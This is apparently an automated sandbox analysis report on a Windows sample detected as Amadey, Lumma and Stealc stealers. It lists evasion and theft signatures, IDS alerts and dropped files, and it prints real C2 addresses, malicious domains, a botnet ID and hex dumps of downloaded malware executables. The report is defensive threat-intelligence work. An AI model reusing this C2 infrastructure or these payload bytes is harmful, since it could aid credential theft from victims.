Windows Analysis Report
xwZfYpo16i.exe

Overview

General Information

Sample name: xwZfYpo16i.exe
renamed because original name is a hash value
Original sample name: a7cd5139890144e22b955bc41174f22b.exe
Analysis ID: 1527965
MD5: a7cd5139890144e22b955bc41174f22b
SHA1: 1df1e8066fca31d34e60fdb40b0e3866f34ed941
SHA256: d0175428447d496447f5f940366744ad3a300e8b3116a2a7852969fac0d12835
Tags: 32exe
Infos:

Detection

LummaC, Amadey, Credential Flusher, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Excessive usage of taskkill to terminate processes
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: xwZfYpo16i.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000003.00000003.2117620927.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 41.0.num.exe.640000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: xwZfYpo16i.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA, 22_2_0064C820
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00647240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 22_2_00647240
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00649AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 22_2_00649AC0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00658EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 22_2_00658EA0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00649B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 22_2_00649B60
Uses 32bit PE files
Source: xwZfYpo16i.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49998 version: TLS 1.0
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.69.239.74:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_00EADBBE
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E7C2A2 FindFirstFileExW, 7_2_00E7C2A2
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB68EE FindFirstFileW,FindClose, 7_2_00EB68EE
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_00EB698F
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_00EAD076
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_00EAD3A9
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_00EB9642
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_00EB979D
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_00EB9B2B
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB5C97 FindFirstFileW,FindNextFileW,FindClose, 7_2_00EB5C97
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 22_2_0064E430
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_006538B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 22_2_006538B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00654570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 22_2_00654570
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 22_2_0064ED20
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_00654910
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 22_2_0064BE70
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0064DE10
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_006416D0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 22_2_00653EA0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0064F6B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0064DA80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49904 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49951 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49920
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50012 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50019 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:63892 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:61141 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:55322 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:62540 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:60548 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:56226 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50028 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:63849 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:64153 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:50418 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:50387 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:62799 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:61767 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:63760 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:60242 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:63944 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:51257 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50048 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:60396 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:56471 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50035 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:64118 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:63026 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:54050 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50163 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:56144 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:50528 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:55255 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50031 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50031 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50043 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50043 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50056 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50056 -> 172.67.206.204:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 11:27:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 11:12:25 GMTETag: "e0600-623e1187eed72"Accept-Ranges: bytesContent-Length: 919040Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 c2 03 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 56 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 5b 06 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 b8 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 9b 00 00 00 40 0d 00 00 9c 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 90 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 11:27:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTETag: "4cc00-6233dc0bf3e80"Accept-Ranges: bytesContent-Length: 314368Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 